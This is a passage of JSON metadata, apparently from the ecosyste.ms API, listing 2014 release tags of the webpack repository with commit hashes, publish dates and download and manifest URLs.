eta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpac